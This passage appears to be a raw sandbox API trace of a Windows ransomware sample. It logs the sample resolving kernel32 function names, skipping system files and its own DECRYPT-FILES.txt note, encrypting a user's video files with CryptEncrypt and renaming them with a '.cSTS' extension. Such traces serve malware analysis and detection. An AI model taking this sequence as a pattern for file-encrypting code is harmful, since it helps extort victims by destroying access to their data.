lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0087.788] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0087.788] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0087.788] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0087.788] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0087.788] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0087.788] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0087.788] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0087.788] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0087.788] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0087.788] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0087.788] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0087.788] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0087.788] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0087.788] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0087.788] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0087.788] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0087.788] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0087.788] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0087.788] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0087.788] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0087.788] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0087.788] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0087.788] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0087.788] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0087.788] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0087.788] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0087.788] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0087.788] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0087.788] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0087.789] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0087.789] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0087.789] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0087.789] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0087.789] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0087.789] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0087.789] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0087.789] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0087.789] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0087.789] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0087.789] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0087.789] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0087.789] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0087.789] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0087.789] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0087.789] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0087.789] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\r6V0OBcF8C5j1Z.mkv") returned 55 [0087.789] wsprintfW (in: param_1=0x3f2e120, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\r6V0OBcF8C5j1Z.mkv.cSTS") returned 60 [0087.789] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\r6V0OBcF8C5j1Z.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\r6v0obcf8c5j1z.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\r6V0OBcF8C5j1Z.mkv.cSTS" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\r6v0obcf8c5j1z.mkv.csts"), dwFlags=0x0) returned 1 [0087.790] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.790] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.790] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.790] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85f9a930, ftCreationTime.dwHighDateTime=0x1d4c899, ftLastAccessTime.dwLowDateTime=0x6c821830, ftLastAccessTime.dwHighDateTime=0x1d4cc67, ftLastWriteTime.dwLowDateTime=0x6c821830, ftLastWriteTime.dwHighDateTime=0x1d4cc67, nFileSizeHigh=0x0, nFileSizeLow=0x301c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tBOJG0lIg.flv", cAlternateFileName="TBOJG0~1.FLV")) returned 1 [0087.790] lstrcmpiW (lpString1="tBOJG0lIg.flv", lpString2="DECRYPT-FILES.txt") returned 1 [0087.791] lstrcmpiW (lpString1="tBOJG0lIg.flv", lpString2="autorun.inf") returned 1 [0087.791] lstrcmpiW (lpString1="tBOJG0lIg.flv", lpString2="boot.ini") returned 1 [0087.791] lstrcmpiW (lpString1="tBOJG0lIg.flv", lpString2="desktop.ini") returned 1 [0087.791] lstrcmpiW (lpString1="tBOJG0lIg.flv", lpString2="ntuser.dat") returned 1 [0087.791] lstrcmpiW (lpString1="tBOJG0lIg.flv", lpString2="iconcache.db") returned 1 [0087.791] lstrcmpiW (lpString1="tBOJG0lIg.flv", lpString2="bootsect.bak") returned 1 [0087.791] lstrcmpiW (lpString1="tBOJG0lIg.flv", lpString2="ntuser.dat.log") returned 1 [0087.791] lstrcmpiW (lpString1="tBOJG0lIg.flv", lpString2="thumbs.db") returned -1 [0087.791] lstrcmpiW (lpString1="tBOJG0lIg.flv", lpString2="Bootfont.bin") returned 1 [0087.791] lstrlenW (lpString="tBOJG0lIg.flv") returned 13 [0087.791] lstrcmpiW (lpString1="flv", lpString2="lnk") returned -1 [0087.791] lstrcmpiW (lpString1="flv", lpString2="exe") returned 1 [0087.791] lstrcmpiW (lpString1="flv", lpString2="sys") returned -1 [0087.791] lstrcmpiW (lpString1="flv", lpString2="dll") returned 1 [0087.791] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned 37 [0087.791] lstrlenW (lpString="tBOJG0lIg.flv") returned 13 [0087.791] lstrcpyW (in: lpString1=0x3f2e920, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" [0087.791] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpString2="tBOJG0lIg.flv" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\tBOJG0lIg.flv") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\tBOJG0lIg.flv" [0087.791] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0087.791] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\tBOJG0lIg.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\tbojg0lig.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x410 [0087.791] GetFileSizeEx (in: hFile=0x410, lpFileSize=0x3f2e0e8 | out: lpFileSize=0x3f2e0e8*=12316) returned 1 [0087.791] CreateFileMappingW (hFile=0x410, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x414 [0087.792] MapViewOfFile (hFileMappingObject=0x414, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0087.792] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0087.792] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0087.792] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0087.792] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2e050*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2e050*=0x100) returned 1 [0087.792] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0087.793] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.793] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0087.794] CloseHandle (hObject=0x414) returned 1 [0087.794] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.794] WriteFile (in: hFile=0x410, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2e070, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2e070*=0x108, lpOverlapped=0x0) returned 1 [0087.794] CloseHandle (hObject=0x0) returned 0 [0087.794] CloseHandle (hObject=0x410) returned 1 [0087.794] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.795] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.795] GetTickCount () returned 0x114e64a [0087.795] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0087.795] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0087.795] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0087.795] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0087.796] lstrlenA (lpString="kernel32.dll") returned 12 [0087.796] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0087.796] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0087.796] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0087.796] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0087.796] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0087.796] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0087.796] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0087.796] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0087.796] lstrlenA (lpString="ADDATOMA") returned 8 [0087.796] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0087.796] lstrlenA (lpString="ADDATOMW") returned 8 [0087.796] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0087.796] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0087.796] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0087.796] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0087.796] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0087.796] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0087.796] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0087.796] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0087.796] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0087.796] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0087.796] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0087.796] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0087.796] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0087.796] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0087.797] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0087.797] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0087.797] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0087.797] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0087.797] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0087.797] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0087.797] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0087.797] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0087.797] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0087.797] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0087.797] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0087.797] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0087.797] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0087.797] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0087.797] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0087.797] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0087.797] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0087.797] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0087.797] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0087.797] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0087.797] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0087.797] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0087.797] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0087.797] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0087.797] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0087.797] lstrlenA (lpString="BACKUPREAD") returned 10 [0087.797] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0087.797] lstrlenA (lpString="BACKUPSEEK") returned 10 [0087.797] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0087.797] lstrlenA (lpString="BACKUPWRITE") returned 11 [0087.797] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0087.797] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0087.797] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0087.797] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0087.797] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0087.797] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0087.797] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0087.797] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0087.798] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0087.798] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0087.798] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0087.798] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0087.798] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0087.798] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0087.798] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0087.798] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0087.798] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0087.798] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0087.798] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0087.798] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0087.798] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0087.798] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0087.798] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0087.798] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0087.798] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0087.798] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0087.798] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0087.798] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0087.798] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0087.798] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0087.798] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0087.798] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0087.798] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0087.798] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0087.798] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0087.798] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0087.798] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0087.798] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0087.798] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0087.798] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0087.798] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0087.798] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0087.798] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0087.798] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0087.798] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0087.799] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0087.799] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0087.799] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0087.799] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0087.799] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0087.799] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0087.799] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0087.799] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0087.799] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0087.799] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0087.799] lstrlenA (lpString="BEEP") returned 4 [0087.799] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0087.799] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0087.799] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0087.799] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0087.799] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0087.799] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0087.799] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0087.799] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0087.799] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0087.799] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0087.799] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0087.799] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0087.799] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0087.799] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0087.799] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0087.799] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0087.799] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0087.799] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0087.799] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0087.799] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0087.799] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0087.799] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0087.799] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIo" | out: 